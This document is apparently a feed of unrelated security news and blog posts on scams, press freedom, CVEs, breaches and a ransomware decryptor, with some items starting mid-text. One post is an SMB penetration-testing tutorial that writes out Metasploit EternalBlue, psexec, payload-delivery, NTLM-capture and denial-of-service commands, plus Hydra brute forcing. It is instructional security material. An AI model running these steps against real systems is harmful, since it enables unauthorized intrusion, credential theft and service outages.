The Federal Trade Commission (FTC) once again sounded the alarm in mid-December about the latest Social Security Number (SSN) scam that continues to affect thousands of Americans.

While most of us were only able to read about this type of scam in the past, the FTC now has an audio recording of an SSN scam robocall, which they released two weeks after the warning.

Play the audio below and familiarize yourselves with what an SSN scam sounds like. Take note of the sentence phrasing and the mild threat at the near end of the automated recording directed to those who aren’t motivated enough to call back the number it provided.


law enforcement agencies to suspend your Social Security number on an immediate basis, as we have received suspicious trails of information in your name. The moment you receive this message, I need you to get back to me on my department division toll-free number that is 1-888-952-5554. I repeat 1-888-952-5554. Verify the last four digits of your Social Security number when you call to better assist you with this issue. Now, if I don’t hear a call from you, we will have to issue an arrest warrant under your name and get you arrested. So, get back to me as soon as possible. Thank you.

This particular recording wasn’t specific about the “suspicious trails of information” they were referring to, but there have been reports to the FTC of scammers linking their target’s SSN to certain crimes they claim are taking place in Texas, such as illegally sending money outside of the country.

The FTC noted that the threat of individuals or groups pretending to be from the Social Security Administration (SSA) are growing at an exponential rate. In fact, there was a 994 percent increase in SSN scams reported to FTC—from 3,200 in 2017 to 35,000 in 2018.

Not just a numb3rs g4m3

One attribute that makes SSN scams successful (and makes one likely to be more accepting of calls) is the scammers’ use of technology to mimic the legitimate contact number of the Social Security Administration (SSA) so that appears in the caller ID when contacting targets. In this case, the scammers used 1-800-772-1213, the SSA’s national customer service number. Yet, SSN scams are more than just a numbers game.

Seeing red

To help clue you in on other tactics used by SSN scammers, below is a list of red flags or tactics these scammers practice that anyone with a Social Security Number should at least be familiar with:

  • The call comes out of nowhere—especially if you haven’t contacted the SSA first or you have no ongoing business with them, such as a pending Social Security Disability (SSD) application. If you do have a pending application with the SSA, an agent may call if the information in the application isn’t complete, answers on the form aren’t legible, or the agent has found some discrepancies between the information you provided in the application and the information they got from other Federal agencies. An SSA agent will only ask for your SSN if the one you provided is invalid or incorrect.
  • The purported SSA agent makes untruthful or worrying requests or claims, such as:
    • Your SSN is suspended because of crime-related links (such as what the robocaller claims in the recording above). Fact: Social Security numbers do not get suspended.
    • You need to “reactivate” your suspended SSN. Then, scammers either ask for more information or a fee to do this.
    • You need to pay for something immediately, like a debt (and they won’t allow you to appeal the amount you owe).
    • You need to send over your payment via a means they specify, such as the agent requiring you to pay using your prepaid debit card.
    • You need to provide a bank routing number or card details over the phone.
    • Your SSN is linked to malicious activities that will lead to your arrest or deportation.
    • The SSA system is down, so you need to provide the purported agent with your personal information, such as SSN, date of birth, mother’s maiden name, and bank information.

“SSA employees do contact citizens by telephone for customer-service purposes, and in some situations, an SSA employee may request the citizen confirm personal information over the phone,” writes Andrew Cannarsa, communications director for the Office of the Inspector General (OIG). “However, SSA employees will never threaten you for information or promise a Social Security benefit approval or increase in exchange for information. In those cases, the call is fraudulent.”

Just hang up

Hanging up is the best course of action when you deliberately or accidentally answered a call that you realized, at some point, appears scammy. When in doubt, assume it’s a scam. Besides, no one, not even the legitimate SSA, will penalize you for hanging up on them. Remember that when it comes to nipping scams in the bud, you are in control. End it before they can say another word.

Prevention, of course, is still key. Being able to catch the known red flags we have identified above and knowing what to do should you see a legitimate SSA number flash in the caller ID screen—whether you do or don’t have outstanding business with them—can minimize the risk.

Is the SSA calling? Don’t pick up the phone. Instead, call SSA via their consumer service number and ask if they have been trying to reach you.

Other scams related to SSN

Unfortunately, children and the deceased aren’t safe from fraudsters and identity thieves, either. Parents, make sure you find the time to check your kids’ credit scores to make sure that they remains untouched and are not being built up by someone else. If you see something’s wrong, or if you see signs of potential identity theft, go to this FTC page to read more.

Relatives of deceased loved ones should do credit checks every now and then as well. The Identity Theft Resource Center has useful material on how one can protect the deceased’s identity and other tips.

When it comes to scams, the following is always true: Does it seems suspicious or “off” in any way? If so, it probably is. Proceed with caution and guard your Social Security Number well.

The post Social Security Number scammers are at it again appeared first on Malwarebytes Labs.

Canadian police block journalists from covering pipeline protest in British Columbia

Bilfinger SE

The Royal Mounted Canadian Police are preventing journalists from covering members of the Wet’suwet’en First Nation’s opposition to the construction of a natural gas pipeline that would run through British Columbia.

Members of the Wet’suwet’en First Nation—including the hereditary leaders—began running checkpoints that block access to the planned construction site of the Coastal GasLink LNG pipeline, which would transport natural gas to the coast of British Columbia. Some members of the the Wet’suwet’en First Nation are concerned that it could damage the watershed and threaten wildlife.

Indigenous opposition to the pipeline is an issue of huge public importance that has been covered by Canadian news outlets for years, including the CBC. But at Gidimt'en camp—one of the checkpoints restricting access without the consent of the hereditary leaders—Royal Canadian Mounted Police turned away numerous members of the press on Jan. 7. This included APTN News and a CBC TV crew from Vancouver.

APTN News reported
that its reporters were informed by an officer that they were barred due to safety concerns, and if reporters tried to pass the checkpoint, they could be arrested and charged with obstruction.

Around the time that RCMP arrived at the checkpoint, several news outlets reported that the communication halted with journalists present at the camp. This reportedly included Jesse Winter and Perrin Grauer at The Star Vancouver, and the Twitter feeds of CBC reporter Chantelle Bellrichard and The Moose’s Sawyer Bogdan.

The Star deputy bureau chief Joanna Chiu tweeted that she had been informed that communications to the area had “been cut” due to a satellite issue. RCMP quickly denied that police had played any part in this lack of communications.

“It sounds like the RCMP is once again using every tactic that they can to bend the law as much as possible to prevent journalists from gaining access to sites,” said Tom Henheffer, vice president of Canadian Journalists for Free Expression (CJFE).

“This is a tactic that is very commonly employed and is very difficult to fight against in the moment because [police] know that when you’ve got a bunch of officers with guns telling people what they can and cannot do, it doesn’t necessarily matter whether the law is on the RCMP’s side or not – because it takes too long for a journalist to get a lawyer, go to court to get an order to allow them to get on to the site,” Henheffer said.

That same day on Jan. 7, RCMP arrested 14 people for allegedly violating a court injunction granting the pipeline company access. The Royal Police also created a "temporary exclusion zone,” which made the area off limits to all but members of the enforcement team.

Pipeline protests can be dangerous for both protesters—who face risks of arrest and physical violence for their political expression—and the press, who are attacked and arrested in large numbers for doing their jobs highlighting it.

Particularly when arrests are being made, media coverage serves a critical function that can help ensure law enforcement does not use excessive force, and if they do, journalists will be there to document it.

Media coverage has been critical in illuminating law enforcement treatment of pipeline resistance protesters across the United States. At Standing Rock in North Dakota, pipeline security forces—both public and private—attacked protesters with dogs, rubber bullets, tear gas, mace, compression grenades, and beanbag grounds.

Reporters and livestreamers at Standing Rock quickly documented these tactics, which quickly gained mainstream media attention and faced intense public backlash. The United Nations' special rapporteur on the rights of freedom of association and peaceful assembly called out the violence against protesters opposing the pipeline, and denounced the arrest conditions as “inhuman and degrading.”

Solidarity rallies are being organized
across Canada and the United States in support of the Wet’suwet’en nation members opposing the LNG pipeline.

"Authorities in Canada should immediately end the arbitrary restrictions on journalists covering the police breakup of the pipeline protest," said CPJ North America Program Coordinator Alexandra Ellerbeck. "Journalists should be able to freely cover events of national importance, without fear of arrest."

Free SuperCounters Widget Serves Unwanted Redirects to Dating Site

Free SuperCounters Widget Serves Unwanted Redirects to Dating Site

If we navigate way back into the recesses of our memory to the era of GeoCities websites and MySpace pages, we might distinctly recollect the popularity of the visitor-counting widget.

Commonly displayed on homepages across the web, these widgets served as credibility indicators to help site visitors identify the popularity of a website.

While this feature may have gone out of vogue with current website design trends and advanced analytics tools, they also fell out of favor for bad behavior – from stealing traffic and redirections to planting trojans and malware.

Continue reading Free SuperCounters Widget Serves Unwanted Redirects to Dating Site at Sucuri Blog.

Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available

This post was cowritten by Jonathan Trull, Chief Security Advisor, Cybersecurity Solutions Group, and Sean Sweeney, Chief Security Advisor, Cybersecurity Solutions Group.

Were excited to announce the availability of the Center for Internet Securitys (CIS) Microsoft 365 Foundations Benchmarkdeveloped by CIS in partnership with Microsoftto provide prescriptive guidance for establishing a secure baseline configuration for Microsoft 365. CIS is a nonprofit entity focused on developing global standards and recognized best practices for securing IT systems and data against the most pervasive attacks.

Microsoft 365 provides powerful online cloud services that enable collaboration, security, and compliance, mobility, intelligence, and analytics. Adopting cloud technologies requires a shared responsibility model for security, with Microsoft responsible for certain controls and the customer responsible for others, depending on the service delivery model chosen. To ensure that a customers cloud workloads are protected, it is important that they carefully consider and implement the appropriate architecture and enable the right set of configuration settings.

The CIS Microsoft 365 Foundations Benchmark is designed to assist organizations in establishing the foundation level of security for anyone adopting Microsoft 365. The benchmark should not be considered as an exhaustive list of all possible security configurations and architecture but as a starting point. Each organization must still evaluate their specific situation, workloads, and compliance requirements and tailor their environment accordingly.

The CIS benchmark contains two levels, each with slightly different technical specifications:

  • Level 1Recommended minimum security settings that should be configured on any system and should cause little or no interruption of service or reduced functionality.
  • Level 2Recommended security settings for highly secure environments and could result in some reduced functionality.

The CIS Microsoft 365 Security Benchmark is divided into the following sections:

Section Description # of recommended controls
Account/Authentication policies Recommendations related to setting the appropriate account and authentication policies. 8
Application permissions Recommendations related to the configuration of application permissions within Microsoft 365. 4
Data management Recommendations for setting data management policies. 6
Email security/Exchange Online Recommendations related to the configuration of Exchange Online and email security. 13
Auditing policies Recommendations for setting auditing policies on your Microsoft 365 tenant. 14
Storage policies Recommendations for securely configuring storage policies. 2
Mobile device management Recommendations for managing devices connecting to Microsoft 365. 13
Total recommendations 60

Each recommendation contains several sections, including a recommendation identification number, title, and description; level or profile applicability; rationale; instructions for auditing the control; remediation steps; impact of implementing the control; default value; and references. For example, the first control contained in the benchmark is under the Account/Authentication policies section and is titled: 1.1 (L1) Ensure multifactor authentication is enabled for all users in administrative roles (Scored).

A control is marked as Scored or Not Scored based on whether it can be programmatically tested. In this case, recommendation 1.1 can be audited leveraging the Microsoft Graph and PowerShell cmdlet. The specific steps for auditing the control are contained in the Audit section for this specific recommendation. This recommendation is listed as a Level 1 control because it is only applied to Microsoft 365 administrative users and would not have a company-wide impact or produce less functionality for users. The rationale for recommendation 1.1 is that Microsoft 365 administrative accounts need to be protected due to their powerful privileges and with Multiple Factor Authentication, an attacker would need to compromise at least two different authentication mechanisms, increasing the difficulty of compromise and thus reducing the risk to the Azure tenant.

Download the benchmark and provide your feedback

The CIS Microsoft 365 Security Benchmark is freely available for download in PDF format on the CIS website. In the continuity of their mission, feedback provided by those entrenched in using and implementing the benchmarks provides us the opportunity for continuous improvement of our products. Feedback can be made visible to CIS by creating a discussion thread or ticket within the CIS Microsoft 365 Foundations Benchmark community. In addition, Microsoft has developed a set of Office 365 security guidelines and best practices for our customers to follow. These guides can be found in Office 365 Security and Compliance documentation.

The post Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available appeared first on Microsoft Secure.

Alerta: campaña de phishing contra el BBVA

La Oficina de Seguridad del Internauta ha detectado una campaña de correos electrónicos fraudulentos que suplantan al BBVA, su objetivo es dirigir a la víctima a una página falsa (phishing) que simula ser la web legítima del banco para robar sus credenciales de acceso. Los correos detectados en esta nueva campaña de phishing tienen normalmente […]

SMB Penetration Testing (Port 445)

In this article, we will learn how to gain control over our victim’s PC through SMB Port. There are various ways to do it and let take time and learn all those, because different circumstances call for different measure.

Table of Content

Introduction to SMB Protocol

  • Working of SMB
  • Versions of Windows SMB
  • SMB Protocol Security

SMB Enumeration

Scanning Vulnerability

Multiple Ways to Exploit SMB

  • Eternal Blue
  • SMB login via Brute Force
  • PSexec to connect SMB
  • Rundll32 One-liner to Exploit SMB
  • SMB Exploit via NTLM Capture

SMB DOS-Attack

Post Exploitation

File Sharing

  • smbserver
  • smbclient

Introduction to SMB Protocol

Server Message Block (SMB), the modern dialect of which was known as Common Internet File System, operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request

Working of SMB

SMB functions as a request-response or client-server protocol. The only time that the protocol does not work in a response-request framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the current mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBUI. Once the connection is established, the client computer or program can then open, read/write, and access files similar to the file system on a local computer.

Versions of Windows SMB

CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.

SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.

SMB 2.0 / SMB2: This version used in Windows Vista and Windows Server 2008.

SMB 2.1 / SMB2.1: This version used in Windows 7 and Windows Server 2008 R2.

SMB 3.0 / SMB3: This version used in Windows 8 and Windows Server 2012.

SMB 3.02 / SMB3: This version used in Windows 8.1 and Windows Server 2012 R2.

SMB 3.1: This version used in Windows Server 2016 and Windows 10.

Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3, and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.

SMB Protocol Security 

The SMB protocol supports two levels of security. The first is the share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core plus SMG protocol definitions. User level protection was later added to the SMB protocol. It is applied to individual files and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.

SMB Enumeration

To identify following information of Windows or Samba system, every pentester go for SMB enumeration during network penertation testing.

  • Banner Grabbing
  • RID cycling
  • User listing
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval

Here you can observe, we are using nmap the most famous network scanning tool for SMB enumeration.

nmap -p 445 -A

As a result, we enumerated following information of the target machine:

Operating System: Windows 7 ultimate

Computer Name & NetBIOS Name: Raj

SMB security mode: SMB 2.02

There are so many automated scripts and tools available for SMB enumeration and if you want to know more about SMB Enumeration then read this article “A Little Guide to SMB Enumeration”.

Scanning Vulnerability

During enumeration phase, generally we go for banner grabbing to identify version of running service and the host operating system. Once you enumerate this information then you should go for vulnerability scanning phase to identify whether the install service is vulnerable version or patched version.

Nmap serves various scripts to identify state of vulnerability for specific services, similarly it has inbuilt script for SMB to identify its vulnerable state for given target IP.

nmap --script smb-vuln* -p 445

As result, it shown the target machine is highly vulnerable to Ms17-010 (eternal blue) due to SMBv1.

To know more about Ms17-010 read complete article “3 ways to scan Eternal Blue Vulnerability in Remote PC

Multiple Ways to Exploit SMB

Eternal Blue

As we know it is vulnerable to MS17-010 and we can use Metasploit to exploit this machine. Therefore we run the following module which will directly exploit target machine.

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost
msf exploit(ms17_010_eternalblue) > exploit

Boomm!! We have successfully access remote machine shell as shown in the bellow image.

SMB login via Brute Force

If you get fail to enumerate the vulnerable state of SMB or found patched version of SMB in the target machine, then we have “Brute force” as another option to gain unauthorized access of remote machine.

Here we only need two dictionaries that contains list of username and password in each and a brute forcer tool to make brute force attack.

hydra -L user.txt -P pass.txt smb

-L –> denotes the path of username list

-P –>denote the path of password

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. After a few minutes, Hydra cracks the credential, as you can observe that we had successfully grabbed the SMB username as raj and password as 123.

To know more about it, read complete article from here “5 Ways to Hack SMB Login Password

If you have SMB login credential, then you can use following module to determine what local users exist via the SAM RPC service.

use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit

PSexec – To Connect SMB

Once you have SMB login credential of target machine then with the help of following module of metasploit you can obtain meterpreter session to access remote shell.

use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit

Once the commands run you will gain a meterpreter session of your victim’s PC and so you can access it as you want.

There so many script and tools are available to connect remote machine using SMB protocol, we have already written an article for connecting SMB in multiple ways. Read complete article from here “Multiple ways to Connect Remote PC using SMB Port”.

Rundll32 One-liner to Exploit SMB

This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost
msf exploit(windows/smb/smb_delivery) > exploit

This will generate a link for malicious dll file, now send this link to your target and wait for his action.

As soon as victim will run above malicious code inside the run prompt or command prompt, we will get meterpreter session at metasploit.

SMB Exploit via NTLM Capture                   

Another method to exploit SMB is NTLM hash capture by capturing response password hashes of SMB target machine.

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost
msf auxiliary(smb) > set johnpwfile /root/Desktop
msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

msf auxiliary(nbns_response) > set spoofip
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can observe that port 137 is open for NetBIOS network service in our local machine.

Now when victim will try to access our share folder therefore he will try of connect with us through his network IP, given below image is a proof to demonstrate that victim is connecting malicious IP: When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured:

Username: raj

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _smb_netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

To know more about it read complete article from here “4 Ways to Capture NTLM Hashes in Network

SMB DOS-Attack

SMB Dos attack is another most excellent method we have in our metasploit framework.

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer or a Word document otherwise.

use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost
msf auxiliary(ms10_006_negotiate_response_loop) > exploit

Now, when the victim will try to access share folder through our malicious IP, the target machine will get crushed and this attack is very effective.

Post Exploitation

This module will enumerate configured and recently used file shares.

use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit

As you can observe that, here it has shown three UNC paths that have been entered in run dialog.

File Sharing  


Now we will use a python script that activates SMB service in our Linux machine. This is useful in the situation where the target machine does NOT have a writeable share available. You can visit to github for this python script.

I copied the python code from github and past it into a text file as smbserver.py in desktop folder. Now execute give below command for a share folder “raj”.

Since we are aware of smb service which is running in host machine and being using window platform we can access it share folder through Run command prompt.

Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it. In this way we can use smb python script for sharing file between windows and Linux machine.


smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

smbclient –L

smbclient //

As you can observe with the help of smbclient we are able to view share folder of victim’s machine. Moreover we can use smbclient for sharing file in the network. Here you can observe we had login successfully using raj: 123 login and transfer the user.txt file.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post SMB Penetration Testing (Port 445) appeared first on Hacking Articles.

Pylocky Unlocked: Cisco Talos releases PyLocky ransomware decryptor

This tool was developed by Mike Bautista.

PyLocky is a family of ransomware written in Python that attempts to masquerade as a Locky variant. This ransomware will encrypt all files on a victim machine before demanding that the user pay a ransom to gain access to their decrypted files. To combat this ransomware, Cisco Talos is releasing a free decryption tool. Because our tool requires the capturing of the initial PyLocky command and control (C2) traffic of an infected machine, it will only work to recover the files on an infected machine where network traffic has been monitored. If the initial C2 traffic has not been captured, our decryption tool will not be able to recover files on an infected machine. This is because the initial callout is used by the malware to send the C2 servers information that it uses in the encryption process.

When PyLocky executes, it generates a random user ID and password and gathers information about the infected machine using WMI wrappers. It also generates a random initialization vector, or IV, which is then base64 encoded and sent to the C2 server along with the system information the malware has gathered. After obtaining the absolute path of every file on the system, the malware then calls the encryption algorithm, passing it the IV and password. Each file is first base64-encoded before it is encrypted. The malware appends the extension ".lockedfile" to each file it encrypts - for example, the file "picture.jpg" would become "picture.jpg.lockedfile." The original file is then overwritten with the attacker's ransom note.

Example of a PyLocky ransom note.

Talos encourages users never to pay an attacker-demanded ransom, as this rarely results in the recovery of encrypted files. Rather, victims of this ransomware should restore from backups if their files cannot be decrypted. Just as in the June 2017 Nyetya attack, Talos has observed on numerous occasions that attackers who are demanding ransoms may have no way to communicate with victims to provide a decryptor. Our free decryption tool can be downloaded here.

Indicators of Compromise

Domain Names








Ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of this malware.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

What is Catphishing?

What is catphishing? It certainly isn’t Garfield lazily sitting in a canoe holding a fishing rod. Catphishing is when a fraudster fabricates an identity and tricks someone via cyber communication into a phony emotional or romantic relationship—usually for financial gain to the scammer—because eventually he’ll hit the victim up for money.

But another reason for catphishing is to lure someone into having a “relationship” with the scammer—to either ultimately publically humiliate them with this information if they’re well-known, or, to prove to a significant other that they’re capable of cheating. Not all catphishers are fraudulent. Sometimes, a person will catphish to catch a criminal.

One doesn’t get reeled in overnight, but the warning signs of the early stages of catphishing are clear: A too good to be true situation. The other party is very attractive (don’t bet for a second it’s really their photo). Another tell-tale sign that should make the alarm bells go off: This person comes out of thin air.

He…or she…will be reluctant to use the phone. Skype is out of the question: “I can’t figure out how to use it,” or, “It’s not compatible with my browser.” To maintain an air of legitimacy, the scammer will finally agree to meet you in person, making the plans sound like they’re running smoothly, but then at the last minute, must cancel the plans due to some crisis.

Some examples of real-life catphishing:

  • The DEA created the identity of a woman arrested on drug charges to nab drug dealers on Facebook.
  • Someone used the identity of a woman they personally knew, Ellie Flynn, to create phony accounts on Facebook, Twitter and Instagram. This fleabag even used “Ellie Flynn” and her photo on dating sites.

So the issue isn’t just the idea of you being tricked into a relationship by the catphisher, but the possibility that YOUR photo, name and other data can be used by the catphisher to commit this crime against someone else or to use it for dating sites. Are you pretty good-looking? Makes you wonder about the possibilities…catphishers DO peruse Facebook for those who are physically blessed.

It’s really difficult to discover that your image/name is being used by a catphisher. For example, suppose your name is Ashlee Patrick and you’re gorgeous. And someone named Ann Casey has decided to use your Facebook profile photo for a dating site she wants to register with, or maybe she wants to create a Facebook account.

How will you ever learn of this…unless, by freako chance, someone who knows you just happens to be on Ann Casey’s (if that’s even her real name) Facebook page or is communicating to her via the dating site?

At any rate, if you’re lucky enough to discover someone has stolen your picture for fraudulent purposes, you can report their phony account. Best ways to protect yourself?

  1. Stop uploading pictures of yourself is one option. This way you have more control of what’s out there.
  2. Use Google Reverse Image Search. https://www.google.com/imghp?gws_rd=ssl simply upload a photo and Google will seek it out.

Robert Siciliano is a Security and Identity Theft Expert. He is the founder of Safr.me a cybersecurity speaking and consulting firm based in Massachussets. See him discussing internet and wireless security on Good Morning America.

Over 202 Million Chinese Job Seekers’ Details Exposed On the Internet

Cybersecurity researcher has discovered online a massive database containing records of more than 202 million Chinese citizens that remained accessible to anyone on the Internet without authentication until last week. The unprotected 854.8 gigabytes of the database was stored in an instance of MongoDB, a NoSQL high performance and cross-platform document-oriented database, hosted by an

CVE-2018-4032 (cleanmymac_x)

An exploitable privilege escalation vulnerability exists in the way the CleanMyMac X software improperly validates inputs. An attacker with local access could use this vulnerability to modify the file system as root. An attacker would need local access to the machine for a successful exploit.

How to create and open compressed files on iPhone, iPad

Many enterprises rely on zip files to exchange data, particularly confidential data. And compression helps keep information safe, even against inquisitive ads trackers lurking inside “free” email or online storage services. How do you handle these things on iPad or iPhone?

How to handle zip files on iPhone

While it isn’t especially obvious, iOS provides some limited features that let you archive and decompress zip files. You can even create a nice little Shortcut to do this for you:

  • Open Shortcuts, Tap Create Shortcut.
  • In the search bar, type Extract Archive: That shortcut should appear in the list below; tap it to add it to your workflow.
  • Returning to the search bar, type Save File. When it appears, tap it to add it to the workflow you are building.
  • Tap the switch button at top right of the shortcut name.
  • In the next pane, you can name the shortcut and give it an icon. The most important change you should make is to enable Show in Share Sheet (flick to green).
  • You can create a second Shortcut to make archives. Just type Make Archive to find the relevant flow and then add Save File and Show in Share Sheet as decribed above. Remember to give it a name, such as Make Archive.
  • Shortcuts can work with multiple compression formats, including .tar, .zip and .iso.

How to use the zip files shortcut:

To read this article in full, please click here

How edge computing can help secure the IoT

Data created by Internet of Things (IoT) sensors must be secured better, say some. A simple password-on-device solution is no longer sufficient thanks to increasing data protection regulations, a new public awareness of tracking, and hugely proliferating devices. 

A new kind of architecture using Security Agents should be aggressively built into local routers and networks to handle IoT security and computation rather than offloading the number-crunching to a data center or the cloud, or indeed trying to perform it on the resource-limited IoT device, IEEE researchers say. In other words, IoT security should be handled at the network level rather than device for best results.

To read this article in full, please click here

Emerson DeltaV

This advisory provides mitigation recommendations for an authentication bypass vulnerability in Emerson's DeltaV distributed control system workstation products.

Tridium Niagara Enterprise Security, Niagara AX, and Niagara 4

This advisory was originally posted to the HSIN ICS-CERT library on November 29, 2018, and is now being released to the NCCIC/ICS-CERT website. This advisory provides mitigation recommendations for a cross-site scripting vulnerability reported in the Tridium Niagara Enterprise Security, the Niagara AX, and the Niagara 4 products.

Neiman Marcus to Pay $1.5 Million in Settlement with 43 States for Data Breach

Neiman Marcus, the Dallas-based chain of luxury department stores, has agreed to pay $1.5 million in compensation to the 43 states affected by a 2013 data breach, announced Texas Attorney General Ken Paxton on Tuesday.

This sum is significantly lower than Target’s settlement of $18.5 million following that retailer’s data breach in the same year, which was estimated to have costed $150 million.

A nation-wide investigation concluded that, in 2013, a third-party gained unauthorized access to 370,000 credit and debit cards used at 77 Neiman Marcus stores from multiple states. The breach went undetected for three months and was publicly announced in January of 2014. Some 9,200 cards were used for illicit purposes, said Paxton.

“Texas law requires businesses to implement and maintain reasonable safeguards against cyberattacks to protect consumers’ personal information from unlawful use or disclosure,” he said. “I urge companies to evaluate whether they have in place a thorough and ongoing written information security program that serves to safeguard their customers’ information.”

The retailer also has to strengthen security and implement a clear policy to fend off attacks and protect customer data. An information security assessment and report from a third party is also required.

Neiman Marcus is not the only luxury department store to expose its customers’ financial data or personal information. In 2018, Saks Fifth Avenue, Saks Off 5th and Lord & Taylor stores also fell victim to unauthorized intrusions that affected their customers.

CVE-2019-5886 (shopxo)

An issue was discovered in ShopXO 1.2.0. In the application\install\controller\Index.php file, there is no validation lock file in the Add method, which allows an attacker to reinstall the database. The attacker can write arbitrary code to database.php during system reinstallation.

CVE-2019-5887 (shopxo)

An issue was discovered in ShopXO 1.2.0. In the UnlinkDir method of the FileUtil.php file, the input parameters are not checked, resulting in input mishandling by the rmdir method. Attackers can delete arbitrary files by using "../" directory traversal.

Reddit users locked out of accounts after ‘security concern’

Reddit users locked out of accounts after 'security concern'

A large number of Reddit users are being told that they will have to reset their passwords in order to regain access to their accounts following what the site is calling a “security concern.”

The lockout has occurred as Reddit’s security team investigates what appears to have been an attempt to log into many users’ accounts through a credential-stuffing attack.

Read more in my article on the Tripwire State of Security blog.

Google to ban harmful, intrusive web ads globally starting July 9

Beginning July 9, 2019, Chrome web browsers worldwide will expand user protections and stop showing disruptive and potentially harmful ads. The safeguards are in place for North America and Europe, but will expand globally come summer.

Google’s planned update for July 9 is driven by the Better Ads Standards developed by the Coalition for Better Ads, a consortium dedicated to improving the web advertising experience based on feedback from over 66,000 consumers worldwide.

The group has identified 12 advertising tools that users find intrusive, including pop-ups, auto-play ads, presidential ads, and large sticky ads. Mobile users are particularly disrupted by full-screen scroll over ads, flashing animated ads, banners with a density larger than 30%, and others.

The Coalition for Better Ads this week announced plans to expand its standards beyond North America and Europe, and Google, being the commander of the Internet that it is, will follow suit with a special update for Chrome users.

“Following the Coalition’s lead, beginning July 9, 2019, Chrome will expand its user protections [globally] and stop showing all ads on sites in any country that repeatedly display these disruptive ads,” according to a post on the Chromium blog.

If you own a website, you want to be sure you don’t attract the referee’s ire come July 9, so consider reviewing your site status in the Ad Experience Report. The tool is designed to identify ad experiences that violate the Better Ads Standards. If the tool finds a violation, you can request a review of your site after you’ve fixed the issues. This not only helps your site, but also helps publishers in the long run, expanding their understanding of intrusive ad experiences.

Reddit users locked out of accounts after “security concern”

A large number of Reddit users are being told that they will have to reset their passwords in order to regain access to their accounts following what the site is calling a "security concern."

